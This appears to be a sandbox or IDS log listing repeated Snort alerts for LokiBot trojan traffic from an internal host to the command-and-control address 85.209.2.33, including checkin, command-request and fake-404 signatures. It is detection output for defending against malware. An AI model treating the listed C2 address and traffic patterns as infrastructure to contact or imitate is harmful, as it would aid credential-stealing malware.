    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49856
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49857 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49857 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49857 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49857 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49857
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49858 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49858 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49858 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49858 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49858
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49859 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49859 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49859 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49859 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49859
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49860 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49860 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49860 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49860 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49860
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49863 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49863 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49863 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49863 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49863
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49864 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49864 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49864 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49864 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49864
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49865 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49865 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49865 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49865 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49865
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49866 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49866 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49866 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49866 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49866
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49867 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49867 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49867 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49867 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49867
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49868 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49868 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49868 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49868 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49868
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49869 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49869 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49869 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49869 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49869
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49870 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49870 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49870 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49870 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49870
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49871 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49871 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49871 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49871 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49871
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49872 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49872 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49872 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49872 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49872
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49873 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49873 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49873 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49873 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49873
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49874 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49874 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49874 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49874 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49874
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49875 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49875 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49875 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49875 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49875
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49876 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49876 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49876 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49876 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49876
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49877 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49877 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49877 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49877 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49877
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49878 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49878 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49878 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49878 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49878
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49879 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49879 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49879 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49879 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49879
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49880 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49880 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49880 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49880 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49880
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49881 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49881 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49881 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49881 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49881
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49882 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49882 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49882 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49882 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49882
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49883 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49883 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49883 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49883 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49883
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49885 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49885 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49885 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49885 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49885
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49886 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49886 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49886 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49886 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49886
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49887 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49887 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49887 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49887 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49887
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49888 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49888 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49888 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49888 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49888
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49889 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49889 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49889 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49889 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49889
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49890 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49890 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49890 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49890 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49890
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49891 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49891 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49891 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49891 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49891
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49892 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49892 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49892 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49892 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49892
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49893 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49893 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49893 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49893 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49893
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49894 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49894 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49894 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49894 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49894
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49895 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49895 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49895 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49895 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49895
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49896 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49896 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49896 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49896 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49896
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49897 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49897 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49897 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49897 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49897
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49898 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49898 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49898 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49898 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49898
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49899 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49899 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49899 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49899 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49899
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49900 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49900 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49900 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49900 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49900
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49901 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49901 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49901 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49901 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49901
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49902 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49902 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49902 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49902 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49902
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49903 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49903 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49903 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49903 -> 85.209.2.33:80
